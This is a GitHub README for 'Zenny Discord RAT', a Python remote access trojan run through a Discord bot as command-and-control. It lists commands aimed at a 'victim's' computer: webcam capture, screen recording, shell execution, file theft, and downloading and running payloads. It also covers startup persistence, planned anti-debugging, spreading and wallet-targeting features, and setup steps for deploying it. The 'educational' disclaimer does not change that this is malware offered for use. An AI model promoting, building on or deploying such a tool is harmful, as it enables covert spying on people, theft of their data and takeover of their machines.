syntheticlol / Discord-RAT

Discord RAT: A versatile bot-based C2 tool that can manage multiple clients at once.

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

πŸ€– Zenny Discord RAT πŸ€–

Disclaimer: This project is for educational purposes only. I am not responsible for any misuse or illegal activities conducted with this tool.

Author: synthetic#2368

πŸ“ Description

The Zenny Discord RAT is a powerful and versatile bot-based C2 (Command and Control) tool designed to provide remote access and control over multiple computer connections. With this tool, you can perform various tasks and manage computers from anywhere, enabling remote administration over long distances.

Screenshot

✨ Features

  • Remote Desktop: Access and control the desktop of connected computers remotely, allowing you to perform actions as if you were physically present.
  • Information Gathering: Gather information from connected computers to gain insights into system details, network configurations, and more.
  • Remote Shell Commands: Execute shell commands on connected computers, enabling you to run scripts, perform system operations, and manage processes remotely.
  • File Management: Upload and download files between your local machine and connected computers, facilitating easy transfer of data and resources.
  • Troll Features: Engage in light-hearted pranks and jokes with built-in troll features, including fake error messages, message floods, and other entertaining interactions.
  • System Monitoring: Monitor system resources, including CPU usage, memory utilization, and network activity, providing insights into the performance and health of connected computers.

πŸ“‹ TODO

  • Less file size
  • Anti debug
  • Hidden bot token
  • More commands for all categories
  • Error handling
  • No bugs

πŸ“‹ Requirements

  • Python 3.x
  • Discord.py library
  • Operating System: Windows/Linux/macOS

πŸ’» Usage

Remote Desktop
  • .screenshot <sessionkey>: Takes a screenshot of the user's PC.
  • .record <sessionkey>: Records the user's screen for 30 seconds.
  • .webcam <sessionkey>: Captures a picture from the user's webcam.
Information Gathering
  • .time <sessionkey>: Retrieves the user's date and time.
  • .Ipinfo <sessionkey>: Retrieves the user's IP information.
  • .sysinfo <sessionkey>: Retrieves the user's system information.
  • .usage <sessionkey>: Tells you the user's disk and CPU usage.
Remote Shell Commands
  • .shell <session> <command>: Executes a command on the victim's computer.
File Management
  • .website <sessionkey> <https://example.com>: Sends the user to a website of choice.
  • .getdownloads <sessionkey>: Gets all user's files in the downloads folder.
  • .download <sessionkey>: Can download any file in their downloads folder.
System Control
  • .restart <sessionkey>: Restarts the user's computer.
  • .shutdown <sessionkey>: Shuts down the user's computer.
  • .screenoff <sessionkey>: Shuts off Victims Monitor
  • .screenon <sessionkey>: Turns Back on Victims Monitor
Malware Commands
  • .upload <session> <filelink>: Uploads and downloads a file and then runs it on the victim's PC.
  • .startup <session>: Puts the RAT on startup.
  • .ddos <website>: COMING SOON.
  • .spread <session>: COMING SOON.
  • .roblox <session>: COMING SOON.
  • .exodus <session>: COMING SOON.
Troll Commands
  • .rickroll <session>: Rickrolls them for 30 seconds, and they cannot escape.
  • .music <session> <file_attachment>: Plays music on their computer.
  • .bluescreen <session>: COMING SOON.

πŸ”§ Setup

  1. Go to Discord Developer Portal and sign in.
  2. Create a new application and set up your bot.
  3. In the bot settings, ensure the required options as shown below:

Bot Settings Image

  1. Go to the OAuth section, select the bot and administrator permissions, scroll down, and copy the generated link.
  2. Go back to the bot settings, reset the token, and copy it.
  3. Update the necessary configuration files with your bot token. 7.Run the Zenny Discord RAT script using Python 3.x.

πŸ“„ License

This project is licensed under the MIT License.

About

Discord RAT: A versatile bot-based C2 tool that can manage multiple clients at once.


Languages

Language:Python 81.9%Language:Batchfile 18.1%